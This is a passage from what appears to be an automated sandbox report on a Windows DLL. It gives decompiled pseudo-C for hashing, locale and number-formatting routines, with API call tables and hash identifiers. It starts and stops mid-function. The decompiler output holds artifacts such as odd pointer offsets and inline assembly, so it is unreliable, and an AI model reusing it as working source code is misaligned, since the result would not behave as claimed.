													 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t246 - 0x50)) + 4)) + _t246 - 0x54)) =  *((intOrPtr*)( *((intOrPtr*)(_t246 - 0x50)) + 4)) - 8;
													_v348 = 0;
													 *_t246 = 0x6daaf3c8;
													_t173 = E6DA88D06(_t246);
													 *[fs:0x0] = _v356;
													return _t173;
												} else {
													_t28 = _t203 + 0x23; // 0x23
													_t206 = _t28 & 0xffffffe0;
													 *(_t206 - 4) = _t203;
													L14:
													_t212 = _t206 + _v56;
													_v48 = _t206;
													_t244 = _t212;
													_v28 = _t212;
													_v40 = _t244;
													E6DA8B0A0(_t237, _t206, 0, _v56);
													_v36 = _t206;
													_t252 = _t255 + 0xc;
													_v44 = _t244;
													goto L15;
												}
											}
										}
									}
								}
							}
						} else {
							L3:
							__imp__CryptDestroyHash(_v20);
							_push(0);
							goto L4;
						}
					}
				}
			}


























































              0x6da82e60
              0x6da82e63
              0x6da82e65
              0x6da82e70
              0x6da82e71
              0x6da82e78
              0x6da82e80
              0x6da82e8a
              0x6da82e8f
              0x6da82e92
              0x6da82e96
              0x6da82e9e
              0x6da82ead
              0x6da82ef7
              0x6da82ef7
              0x6da82eff
              0x6da82f06
              0x6da82f08
              0x6da82f14
              0x6da82f17
              0x6da82f21
              0x6da82f2e
              0x6da82eaf
              0x6da82eaf
              0x6da82eb2
              0x6da82ec6
              0x6da82ecc
              0x6da82ed0
              0x6da82eee
              0x6da82ef1
              0x00000000
              0x6da82ed2
              0x6da82ed9
              0x6da82ee1
              0x6da82f34
              0x6da82f3c
              0x6da82f3f
              0x6da82f4c
              0x6da82f52
              0x6da82f54
              0x00000000
              0x6da82f56
              0x6da82f56
              0x6da82f5b
              0x6da82f5d
              0x6da82f60
              0x6da82f62
              0x6da82f65
              0x6da82f68
              0x6da82f6b
              0x6da82f6e
              0x6da82f71
              0x6da82f73
              0x6da82fe0
              0x6da82fe2
              0x6da82fe5
              0x6da82ff3
              0x6da82ff9
              0x6da82ffb
              0x6da8306f
              0x6da83074
              0x6da83076
              0x6da8307a
              0x6da8307d
              0x6da8307f
              0x6da83086
              0x6da83090
              0x6da8309f
              0x6da830ad
              0x6da830b0
              0x6da830bb
              0x6da830dd
              0x6da830e9
              0x6da830ee
              0x6da830ef
              0x6da830ef
              0x6da830f3
              0x6da830f3
              0x6da830f9
              0x6da83104
              0x6da8310a
              0x6da8310e
              0x6da83111
              0x6da8311b
              0x6da83121
              0x6da83128
              0x6da8312f
              0x6da83132
              0x6da83139
              0x6da8313e
              0x6da83145
              0x6da83147
              0x6da8316e
              0x6da8316e
              0x6da83171
              0x6da83195
              0x6da83195
              0x6da83198
              0x6da83173
              0x6da83179
              0x6da8317b
              0x6da8317d
              0x00000000
              0x6da8317f
              0x6da83185
              0x6da83191
              0x6da83191
              0x6da8317d
              0x6da83149
              0x6da8314f
              0x6da83151
              0x6da83153
              0x00000000
              0x6da83155
              0x6da8315b
              0x6da83161
              0x6da83168
              0x6da8316a
              0x6da8316a
              0x6da83153
              0x6da8319b
              0x6da8319d
              0x6da8319f
              0x6da831a3
              0x6da831a3
              0x6da831a8
              0x6da831b8
              0x6da831c9
              0x6da831cc
              0x6da831cf
              0x6da831dc
              0x6da831e7
              0x6da831ea
              0x6da831fb
              0x6da831fe
              0x6da83201
              0x6da8320e
              0x6da83213
              0x6da8321d
              0x6da83222
              0x6da83225
              0x6da83227
              0x00000000
              0x6da83229
              0x6da8322c
              0x6da8322e
              0x6da83230
              0x6da83236
              0x6da83248
              0x6da83248
              0x6da83249
              0x00000000
              0x6da83238
              0x6da83238
              0x6da8323b
              0x6da83243
              0x6da83246
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x6da83246
              0x6da83236
              0x6da82ffd
              0x6da83000
              0x6da8300b
              0x6da83011
              0x6da83013
              0x6da8301b
              0x6da83022
              0x6da8302e
              0x6da83031
              0x6da83036
              0x6da83039
              0x6da8303b
              0x6da83252
              0x6da83259
              0x6da83264
              0x6da83041
              0x6da83041
              0x6da83043
              0x6da83049
              0x6da83061
              0x6da83061
              0x6da83062
              0x6da8324a
              0x6da8324a
              0x00000000
              0x6da8304b
              0x6da8304b
              0x6da8304e
              0x6da83056
              0x6da83059
              0x00000000
              0x6da8305f
              0x6da8305f
              0x00000000
              0x6da8305f
              0x6da83059
              0x6da83049
              0x6da8303b
              0x6da82f75
              0x6da82f75
              0x6da82f7b
              0x6da83265
              0x00000000
              0x6da82f81
              0x6da82f81
              0x6da82f87
              0x6da82fb1
              0x6da82fb6
              0x6da82fb9
              0x00000000
              0x6da82f89
              0x6da82f89
              0x6da82f89
              0x6da82f8c
              0x6da82f8e
              0x6da8326a
              0x6da8326a
              0x00000000
              0x6da82f94
              0x6da82f95
              0x6da82f9a
              0x6da82f9d
              0x6da82f9f
              0x6da8326f
              0x6da8326f
              0x6da83274
              0x6da83275
              0x6da83276
              0x6da83277
              0x6da83278
              0x6da83279
              0x6da8327a
              0x6da8327b
              0x6da8327c
              0x6da8327d
              0x6da8327e
              0x6da8327f
              0x6da83280
              0x6da83289
              0x6da8328b
              0x6da83290
              0x6da83291
              0x6da8329b
              0x6da832a1
              0x6da832b2
              0x6da832b9
              0x6da832c4
              0x6da832d5
              0x6da832d9
              0x6da832e1
              0x6da832e7
              0x6da832f2
              0x6da832fd
              0x6da82fa5
              0x6da82fa5
              0x6da82fa8
              0x6da82fab
              0x6da82fbb
              0x6da82fc2
              0x6da82fc5
              0x6da82fc8
              0x6da82fca
              0x6da82fcd
              0x6da82fd0
              0x6da82fd7
              0x6da82fda
              0x6da82fdd
              0x00000000
              0x6da82fdd
              0x6da82f9f
              0x6da82f8e
              0x6da82f87
              0x6da82f7b
              0x6da82f73
              0x6da82ee3
              0x6da82ee3
              0x6da82ee6
              0x6da82eec
              0x00000000
              0x6da82eec
              0x6da82ee1
              0x6da82ed0

              APIs
              • CryptAcquireContextA.ADVAPI32(000000FF,00000000,00000000,00000018,F0000000,00000000,6DAD48E8,00000000), ref: 6DA82EA5
              • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,?), ref: 6DA82EC6
              • CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 6DA82ED9
              • CryptDestroyHash.ADVAPI32(00000000), ref: 6DA82EE6
              • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 6DA82EF1
              • CryptGetHashParam.ADVAPI32(00000000,00000004,00000000,?,00000000), ref: 6DA82F4C
              • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 6DA82FF3
              • CryptDestroyHash.ADVAPI32(00000000), ref: 6DA83000
              • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 6DA8300B
              • CryptDestroyHash.ADVAPI32(00000000), ref: 6DA830F9
              • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 6DA83104
              • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6DA8321D
              • Concurrency::cancel_current_task.LIBCPMT ref: 6DA8326A
              • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6DA832E7
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: Crypt$Hash$Context$DestroyRelease$Ios_base_dtorParamstd::ios_base::_$AcquireConcurrency::cancel_current_taskCreateData
              • String ID:
              • API String ID: 1151079929-0
              • Opcode ID: 134b624ceb773a88268b25f6e2e8248c5014904688bb71e92ac06a6898949af8
              • Instruction ID: c52cf2d13114aff00d3726297c697f8707102f4e3ea74b80d23507ca319cc1a0
              • Opcode Fuzzy Hash: 134b624ceb773a88268b25f6e2e8248c5014904688bb71e92ac06a6898949af8
              • Instruction Fuzzy Hash: 9AD1CF74A08219DFEB14CF58CD84BAEBBB4FF09304F1442A9E919AB381D775A984CF51
              Uniqueness

              Uniqueness Score: -1.00%

              Function 6DA9BFAE Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 251COMMONLIBRARYCODE
              Download Yara Rule
              C-Code - Quality: 70%
              			E6DA9BFAE(void* __ecx, void* __edx, intOrPtr* _a4, signed short* _a8, intOrPtr _a12) {
				intOrPtr* _v8;
				signed int _v12;
				intOrPtr _v40;
				signed int _v52;
				char _v252;
				short _v292;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t33;
				short* _t34;
				intOrPtr* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed short _t39;
				signed short* _t42;
				intOrPtr _t45;
				void* _t47;
				signed int _t50;
				void* _t52;
				signed int _t56;
				void* _t68;
				void* _t72;
				void* _t73;
				void* _t77;
				intOrPtr* _t84;
				short* _t87;
				void* _t89;
				intOrPtr* _t92;
				intOrPtr* _t96;
				signed int _t114;
				void* _t115;
				intOrPtr* _t117;
				intOrPtr _t119;
				signed int* _t120;
				void* _t121;
				void* _t122;
				intOrPtr* _t123;
				signed short _t125;
				int _t127;
				void* _t128;
				void* _t131;
				signed int _t132;

				_push(__ecx);
				_push(__ecx);
				_push(_t122);
				_t117 = _a4;
				_t33 = E6DA92BDC(__ecx, __edx, _t122);
				_t114 = 0;
				_v12 = 0;
				_t3 = _t33 + 0x50; // 0x50
				_t123 = _t3;
				_t4 = _t123 + 0x250; // 0x2a0
				_t34 = _t4;
				 *((intOrPtr*)(_t123 + 8)) = 0;
				 *_t34 = 0;
				_t6 = _t123 + 4; // 0x54
				_t84 = _t6;
				_v8 = _t34;
				_t92 = _t117;
				_t35 = _t117 + 0x80;
				 *_t123 = _t117;
				 *_t84 = _t35;
				if( *_t35 != 0) {
					E6DA9BF41(0x6daa8460, 0x16, _t84);
					_t92 =  *_t123;
					_t131 = _t131 + 0xc;
					_t114 = 0;
				}
				_push(_t123);
				if( *_t92 == _t114) {
					E6DA9B8B2(_t84, _t92);
					goto L12;
				} else {
					if( *((intOrPtr*)( *_t84)) == _t114) {
						E6DA9B9D2();
					} else {
						E6DA9B939(_t92);
					}
					if( *((intOrPtr*)(_t123 + 8)) == 0) {
						_t77 = E6DA9BF41(0x6daa8150, 0x40, _t123);
						_t131 = _t131 + 0xc;
						if(_t77 != 0) {
							_push(_t123);
							if( *((intOrPtr*)( *_t84)) == 0) {
								E6DA9B9D2();
							} else {
								E6DA9B939(0);
							}
							L12:
						}
					}
				}
				if( *((intOrPtr*)(_t123 + 8)) == 0) {
					L37:
					_t37 = 0;
					goto L38;
				} else {
					_t38 = _t117 + 0x100;
					if( *_t117 != 0 ||  *_t38 != 0) {
						_t39 = E6DA9BDFE(_t38, _t123);
					} else {
						_t39 = GetACP();
					}
					_t125 = _t39;
					if(_t125 == 0 || _t125 == 0xfde8 || IsValidCodePage(_t125 & 0x0000ffff) == 0) {
						goto L37;
					} else {
						_t42 = _a8;
						if(_t42 != 0) {
							 *_t42 = _t125;
						}
						_t119 = _a12;
						if(_t119 == 0) {
							L36:
							_t37 = 1;
							L38:
							return _t37;
						} else {
							_t96 = _v8;
							_t15 = _t119 + 0x120; // 0xd0
							_t87 = _t15;
							 *_t87 = 0;
							_t16 = _t96 + 2; // 0x6
							_t115 = _t16;
							do {
								_t45 =  *_t96;
								_t96 = _t96 + 2;
							} while (_t45 != _v12);
							_t18 = (_t96 - _t115 >> 1) + 1; // 0x3
							_t47 = E6DA9B800(_t96 - _t115 >> 1, _t87, 0x55, _v8);
							_t132 = _t131 + 0x10;
							if(_t47 != 0) {
								L39:
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E6DA8DAEC();
								asm("int3");
								_t130 = _t132;
								_t50 =  *0x6dab3014; // 0x6c4e8ceb
								_v52 = _t50 ^ _t132;
								_push(_t87);
								_push(_t125);
								_t126 = _v40;
								_push(_t119);
								_t52 = E6DA92BDC(_t98, _t115, _v40);
								_t88 = _t52;
								_t120 =  *(E6DA92BDC(_t98, _t115, _v40) + 0x34c);
								_t127 = E6DA9C6E9(_t126);
								asm("sbb ecx, ecx");
								_t56 = GetLocaleInfoW(_t127, ( ~( *(_t52 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
								if(_t56 != 0) {
									if(E6DA990B4(_t120, _t127,  *((intOrPtr*)(_t88 + 0x54)),  &_v252) == 0 && E6DA9C81E(_t127) != 0) {
										 *_t120 =  *_t120 | 0x00000004;
										_t120[2] = _t127;
										_t120[1] = _t127;
									}
									_t62 =  !( *_t120 >> 2) & 0x00000001;
								} else {
									 *_t120 =  *_t120 & _t56;
									_t62 = _t56 + 1;
								}
								_pop(_t121);
								_pop(_t128);
								_pop(_t89);
								return E6DA89B91(_t62, _t89, _v12 ^ _t130, _t115, _t121, _t128);
							} else {
								if(E6DA96812(_t87, 0x1001, _t119, 0x40) == 0) {
									goto L37;
								} else {
									_t20 = _t119 + 0x80; // 0x30
									_t87 = _t20;
									_t21 = _t119 + 0x120; // 0xd0
									if(E6DA96812(_t21, 0x1002, _t87, 0x40) == 0) {
										goto L37;
									} else {
										_push(0x5f);
										_t68 = E6DAA21B7(_t98);
										_t98 = _t87;
										if(_t68 != 0) {
											L31:
											_t22 = _t119 + 0x120; // 0xd0
											if(E6DA96812(_t22, 7, _t87, 0x40) == 0) {
												goto L37;
											} else {
												goto L32;
											}
										} else {
											_push(0x2e);
											_t73 = E6DAA21B7(_t98);
											_t98 = _t87;
											if(_t73 == 0) {
												L32:
												_t119 = _t119 + 0x100;
												if(_t125 != 0xfde9) {
													E6DAA0752(_t98, _t125, _t119, 0x10, 0xa);
													goto L36;
												} else {
													_push(5);
													_t72 = E6DA9B800(_t98, _t119, 0x10, L"utf8");
													_t132 = _t132 + 0x10;
													if(_t72 != 0) {
														goto L39;
													} else {
														goto L36;
													}
												}
											} else {
												goto L31;
											}
										}
									}
								}
							}
						}
					}
				}
			}















































              0x6da9bfb3
              0x6da9bfb4
              0x6da9bfb6
              0x6da9bfb8
              0x6da9bfbb
              0x6da9bfc2
              0x6da9bfc4
              0x6da9bfc7
              0x6da9bfc7
              0x6da9bfca
              0x6da9bfca
              0x6da9bfd0
              0x6da9bfd3
              0x6da9bfd6
              0x6da9bfd6
              0x6da9bfd9
              0x6da9bfdc
              0x6da9bfde
              0x6da9bfe4
              0x6da9bfe6
              0x6da9bfeb
              0x6da9bff5
              0x6da9bffa
              0x6da9bffc
              0x6da9bfff
              0x6da9bfff
              0x6da9c001
              0x6da9c005
              0x6da9c04e
              0x00000000
              0x6da9c007
              0x6da9c00c
              0x6da9c015
              0x6da9c00e
              0x6da9c00e
              0x6da9c00e
              0x6da9c020
              0x6da9c02a
              0x6da9c02f
              0x6da9c034
              0x6da9c03a
              0x6da9c03e
              0x6da9c047
              0x6da9c040
              0x6da9c040
              0x6da9c040
              0x6da9c053
              0x6da9c053
              0x6da9c034
              0x6da9c020
              0x6da9c059
              0x6da9c195
              0x6da9c195
              0x00000000
              0x6da9c05f
              0x6da9c05f
              0x6da9c068
              0x6da9c079
              0x6da9c06f
              0x6da9c06f
              0x6da9c06f
              0x6da9c080
              0x6da9c084
              0x00000000
              0x6da9c0a8
              0x6da9c0a8
              0x6da9c0ad
              0x6da9c0af
              0x6da9c0af
              0x6da9c0b1
              0x6da9c0b6
              0x6da9c190
              0x6da9c192
              0x6da9c197
              0x6da9c19b
              0x6da9c0bc
              0x6da9c0bc
              0x6da9c0bf
              0x6da9c0bf
              0x6da9c0c7
              0x6da9c0ca
              0x6da9c0ca
              0x6da9c0cd
              0x6da9c0cd
              0x6da9c0d0
              0x6da9c0d3
              0x6da9c0dd
              0x6da9c0e7
              0x6da9c0ec
              0x6da9c0f1
              0x6da9c19c
              0x6da9c19e
              0x6da9c19f
              0x6da9c1a0
              0x6da9c1a1
              0x6da9c1a2
              0x6da9c1a3
              0x6da9c1a8
              0x6da9c1ac
              0x6da9c1b4
              0x6da9c1bb
              0x6da9c1be
              0x6da9c1bf
              0x6da9c1c0
              0x6da9c1c3
              0x6da9c1c4
              0x6da9c1c9
              0x6da9c1d1
              0x6da9c1e0
              0x6da9c1ec
              0x6da9c1fd
              0x6da9c205
              0x6da9c21f
              0x6da9c22c
              0x6da9c22f
              0x6da9c232
              0x6da9c232
              0x6da9c23c
              0x6da9c207
              0x6da9c207
              0x6da9c209
              0x6da9c209
              0x6da9c242
              0x6da9c243
              0x6da9c246
              0x6da9c24d
              0x6da9c0f7
              0x6da9c107
              0x00000000
              0x6da9c10d
              0x6da9c10f
              0x6da9c10f
              0x6da9c11b
              0x6da9c129
              0x00000000
              0x6da9c12b
              0x6da9c12b
              0x6da9c12e
              0x6da9c134
              0x6da9c137
              0x6da9c147
              0x6da9c14c
              0x6da9c15a
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x6da9c139
              0x6da9c139
              0x6da9c13c
              0x6da9c142
              0x6da9c145
              0x6da9c15c
              0x6da9c15c
              0x6da9c168
              0x6da9c188
              0x00000000
              0x6da9c16a
              0x6da9c16a
              0x6da9c174
              0x6da9c179
              0x6da9c17e
              0x00000000
              0x6da9c180
              0x00000000
              0x6da9c180
              0x6da9c17e
              0x00000000
              0x00000000
              0x00000000
              0x6da9c145
              0x6da9c137
              0x6da9c129
              0x6da9c107
              0x6da9c0f1
              0x6da9c0b6
              0x6da9c084

              APIs
                • Part of subcall function 6DA92BDC: GetLastError.KERNEL32(?,00000008,6DA98ED9), ref: 6DA92BE0
                • Part of subcall function 6DA92BDC: SetLastError.KERNEL32(00000000,?,00000005,000000FF), ref: 6DA92C82
              • GetACP.KERNEL32(?,?,?,?,?,?,6DA9361F,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 6DA9C06F
              • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6DA9361F,?,?,?,00000055,?,-00000050,?,?), ref: 6DA9C09A
              • _wcschr.LIBVCRUNTIME ref: 6DA9C12E
              • _wcschr.LIBVCRUNTIME ref: 6DA9C13C
              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 6DA9C1FD
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
              • String ID: utf8
              • API String ID: 4147378913-905460609
              • Opcode ID: 460e3757473499b3acedd39295f94c3f7e9923c3568a295f982efffb07408232
              • Instruction ID: 4263c8687c5795e0899addb16826112fc55b9bb746515c28ac501e415c2ba56c
              • Opcode Fuzzy Hash: 460e3757473499b3acedd39295f94c3f7e9923c3568a295f982efffb07408232
              • Instruction Fuzzy Hash: 4E71057562CB06AAEB149B75CD81BB673F8EF09304F198129E615DF1C0EB74E9C087A4
              Uniqueness

              Uniqueness Score: -1.00%

              Function 6DA9CC86 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1436COMMONCrypto
              Download Yara Rule
              C-Code - Quality: 70%
              			E6DA9CC86(signed int __edx, void* __edi, void* __eflags, signed char _a4, signed int _a8, intOrPtr _a12, signed int _a16, signed int _a20, signed int _a24, intOrPtr _a28) {
				signed int _v8;
				signed int _v464;
				void _v468;
				signed int _v472;
				signed int _v932;
				signed int _v936;
				signed int _v1392;
				signed int _v1396;
				signed int _v1400;
				char _v1860;
				signed int _v1864;
				signed int _v1868;
				signed int _v1872;
				signed int _v1876;
				signed int _v1880;
				char _v1881;
				signed int _v1888;
				signed int _v1892;
				signed int _v1896;
				signed int _v1900;
				signed int _v1904;
				signed int _v1908;
				intOrPtr _v1912;
				signed int* _v1916;
				signed int _v1920;
				signed int _v1924;
				signed int _v1928;
				signed int _v1932;
				signed int _v1936;
				char _v1944;
				signed int _v1952;
				signed int _v1956;
				char _v2416;
				signed int _v2420;
				signed int _v2448;
				void* __ebx;
				void* __esi;
				signed int _t802;
				intOrPtr _t812;
				signed int _t819;
				signed int _t825;
				void* _t829;
				signed int _t830;
				intOrPtr _t836;
				void* _t837;
				signed int _t843;
				signed int _t848;
				signed int _t849;
				signed int _t850;
				signed int _t853;
				signed int _t855;
				signed int _t857;
				signed int _t858;
				signed int _t863;
				signed int _t864;
				signed int _t869;
				signed int _t871;
				signed int _t872;
				signed int _t879;
				signed int _t880;
				signed int _t888;
				signed int _t891;
				signed int _t896;
				signed int* _t899;
				signed int _t903;
				signed int _t914;
				signed int _t915;
				signed int _t917;
				signed int _t918;
				char* _t919;
				signed int _t922;
				signed int _t928;
				signed int _t930;
				signed int _t934;
				signed int _t942;
				signed int _t945;
				signed int _t948;
				signed int _t951;
				signed int _t960;
				signed int _t961;
				signed int _t964;
				signed int _t977;
				signed int _t978;
				signed int _t980;
				signed int _t981;
				signed int* _t982;
				signed int _t985;
				signed int* _t988;
				signed int _t991;
				signed int _t993;
				signed int _t998;
				signed int _t1006;
				signed int _t1009;
				signed int _t1013;
				signed int _t1016;
				signed int _t1025;
				intOrPtr _t1030;
				signed int _t1031;
				signed int _t1037;
				void* _t1045;
				signed int _t1046;
				signed int _t1047;
				signed int _t1048;
				signed int* _t1051;
				signed int _t1059;
				signed int _t1063;
				signed int _t1065;
				signed int _t1070;
				void* _t1076;
				signed int _t1077;
				signed int _t1078;
				signed int _t1079;
				signed int _t1082;
				signed int _t1087;
				signed int _t1088;
				signed int _t1092;
				signed int _t1094;
				signed int _t1099;
				signed int _t1101;
				signed int _t1102;
				void* _t1105;
				signed char _t1106;
				signed int _t1112;
				signed int _t1113;
				signed int _t1115;
				signed int _t1122;
				void* _t1127;
				signed char _t1133;
				intOrPtr* _t1136;
				signed int _t1141;
				signed int _t1142;
				void* _t1144;
				signed int _t1147;
				signed int _t1149;
				signed int _t1150;
				signed int _t1151;
				signed int _t1158;
				signed int _t1162;
				signed int _t1163;
				signed int _t1164;
				signed int _t1165;
				signed int _t1167;
				signed int* _t1169;
				signed int _t1170;
				signed int _t1174;
				signed int _t1175;
				signed int _t1176;
				signed int _t1177;
				signed int _t1179;
				signed int _t1181;
				signed int _t1182;
				signed int _t1186;
				signed int _t1187;
				unsigned int _t1188;
				unsigned int _t1192;
				unsigned int _t1195;
				signed int _t1196;
				signed int _t1199;
				signed int* _t1202;
				signed int _t1205;
				void* _t1207;
				unsigned int _t1208;
				signed int _t1209;
				signed int _t1212;
				signed int* _t1215;
				signed int _t1218;
				signed char _t1220;
				signed int _t1227;
				signed int _t1228;
				signed int _t1229;
				signed int _t1230;
				signed int _t1233;
				signed int _t1235;
				signed int _t1237;
				char _t1240;
				signed int _t1242;
				signed int _t1243;
				signed int _t1244;
				signed int _t1245;
				signed int _t1246;
				signed int _t1247;
				signed int _t1248;
				signed int _t1250;
				signed int _t1251;
				signed int _t1252;
				signed int _t1253;
				signed int _t1254;
				void* _t1255;
				signed int _t1256;
				signed int _t1258;
				signed int _t1263;
				signed int _t1267;
				void* _t1268;
				intOrPtr _t1269;
				void* _t1272;
				unsigned int _t1275;
				signed int _t1276;
				void* _t1277;
				signed int _t1279;
				signed int _t1280;
				signed int _t1281;
				signed int _t1282;
				signed int _t1285;
				signed int _t1286;
				signed int _t1287;
				signed int _t1288;
				signed int _t1289;
				signed int _t1292;
				signed int _t1293;
				signed int _t1294;
				signed int _t1295;
				void* _t1296;
				void* _t1299;
				signed int _t1301;
				signed int _t1305;
				signed int* _t1307;
				signed int _t1311;
				signed int _t1312;
				signed int _t1315;
				signed int _t1317;
				signed int _t1318;
				signed int _t1320;
				void* _t1323;
				void* _t1324;
				signed int _t1326;
				signed int _t1327;
				signed int _t1328;
				signed int _t1330;
				signed int _t1331;
				signed int _t1332;
				signed int _t1334;
				signed int _t1344;
				void* _t1346;
				signed char* _t1347;
				signed char* _t1348;
				signed int _t1352;
				signed char _t1360;

				_t1268 = __edi;
				_t1227 = __edx;
				_t802 =  *0x6dab3014; // 0x6c4e8ceb
				_v8 = _t802 ^ _t1344;
				_v1932 = _a20;
				_v1888 = _a24;
				E6DAA0952(__eflags,  &_v1952);
				_t1122 = 1;
				if((_v1952 & 0x0000001f) != 0x1f) {
					E6DAA09BA(__eflags,  &_v1952);
					_v1944 = 1;
				} else {
					_v1944 = 0;
				}
				_t1315 = _a8;
				_push(_t1268);
				_t1269 = 0x20;
				_t1352 = _t1315;
				if(_t1352 > 0 || _t1352 >= 0 && _a4 >= 0) {
					_t812 = _t1269;
				} else {
					_t812 = 0x2d;
				}
				_t1136 = _v1932;
				 *_t1136 = _t812;
				 *((intOrPtr*)(_t1136 + 8)) = _v1888;
				E6DAA08F3( &_v1956, 0, 0);
				_t1347 = _t1346 + 0xc;
				if((_t1315 & 0x7ff00000) != 0) {
					L12:
					_t819 = E6DA947F7( &_a4);
					__eflags = _t819;
					if(_t819 == 0) {
						L24:
						_v1936 = _v1936 & 0x00000000;
						_a8 = _t1315 & 0x7fffffff;
						_t1360 = _a4;
						asm("fst qword [ebp-0x774]");
						_t1317 = _v1908;
						_v1928 = _a12 + 1;
						_t1141 = _t1317 >> 0x14;
						_t825 = _t1141 & 0x000007ff;
						__eflags = _t825;
						if(_t825 != 0) {
							_t825 = 0;
							_t1228 = 0x100000;
							_t41 =  &_v1868;
							 *_t41 = _v1868 & 0;
							__eflags =  *_t41;
						} else {
							_t1228 = 0;
							_v1868 = _t1122;
						}
						_t1318 = _t1317 & 0x000fffff;
						_v1924 = _v1912 + _t825;
						asm("adc esi, edx");
						_t1142 = _t1141 & 0x000007ff;
						_v1872 = _v1868 + _t1142;
						E6DAA0A10(_t1142, _t1360);
						_push(_t1142);
						 *_t1347 = _t1360;
						_t829 = E6DAA0B20(_t1142);
						_t1144 = _t1142;
						_t830 = L6DAA1FF0(_t829, _t1122, _t1144, _t1228);
						_v1904 = _t830;
						_t1272 = 0x20;
						__eflags = _t830 - 0x7fffffff;
						if(_t830 == 0x7fffffff) {
							L29:
							__eflags = 0;
							_v1904 = 0;
						} else {
							__eflags = _t830 - 0x80000000;
							if(_t830 == 0x80000000) {
								goto L29;
							}
						}
						_t1229 = _v1872;
						__eflags = _t1318;
						_v468 = _v1924;
						_v464 = _t1318;
						_t1147 = (0 | _t1318 != 0x00000000) + 1;
						_v1868 = _t1147;
						_v472 = _t1147;
						__eflags = _t1229 - 0x433;
						if(_t1229 < 0x433) {
							__eflags = _t1229 - 0x35;
							if(_t1229 == 0x35) {
								L100:
								__eflags = _t1318;
								_t211 =  &_v1908;
								 *_t211 = _v1908 & 0x00000000;
								__eflags =  *_t211;
								_t836 =  *((intOrPtr*)(_t1344 + 4 + (0 | _t1318 != 0x00000000) * 4 - 0x1d4));
								asm("bsr eax, eax");
								if( *_t211 == 0) {
									_t837 = 0;
									__eflags = 0;
								} else {
									_t837 = _t836 + 1;
								}
								__eflags = _t1272 - _t837 - _t1122;
								asm("sbb esi, esi");
								_t1320 =  ~_t1318 + _t1147;
								__eflags = _t1320 - 0x73;
								if(_t1320 <= 0x73) {
									_t1230 = _t1320 - 1;
									__eflags = _t1230 - 0xffffffff;
									if(_t1230 != 0xffffffff) {
										_t1296 = _t1230 - 1;
										while(1) {
											__eflags = _t1230 - _t1147;
											if(_t1230 >= _t1147) {
												_t1025 = 0;
												__eflags = 0;
											} else {
												_t1025 =  *(_t1344 + _t1230 * 4 - 0x1d0);
											}
											__eflags = _t1296 - _t1147;
											if(_t1296 >= _t1147) {
												_t1188 = 0;
												__eflags = 0;
											} else {
												_t1188 =  *(_t1344 + _t1230 * 4 - 0x1d4);
											}
											 *(_t1344 + _t1230 * 4 - 0x1d0) = _t1188 >> 0x0000001f | _t1025 + _t1025;
											_t1230 = _t1230 - 1;
											_t1296 = _t1296 - 1;
											__eflags = _t1230 - 0xffffffff;
											if(_t1230 == 0xffffffff) {
												goto L115;
											}
											_t1147 = _v472;
										}
									}
									L115:
									_v472 = _t1320;
								} else {
									_v1400 = _v1400 & 0x00000000;
									_v472 = _v472 & 0x00000000;
									E6DA90928( &_v468, 0x1cc,  &_v1396, 0);
									_t1347 =  &(_t1347[0x10]);
								}
								_t1275 = 0x434 >> 5;
								E6DA8B0A0(0x434 >> 5,  &_v1396, 0, 0x434);
								__eflags = 1;
								 *(_t1344 + 0xbad63d) = 1 << (0x00000434 - _v1872 & 0x0000001f);
							} else {
								_v1396 = _v1396 & 0x00000000;
								_v1392 = 0x100000;
								_v1400 = 2;
								__eflags = _t1318;
								if(_t1318 != 0) {
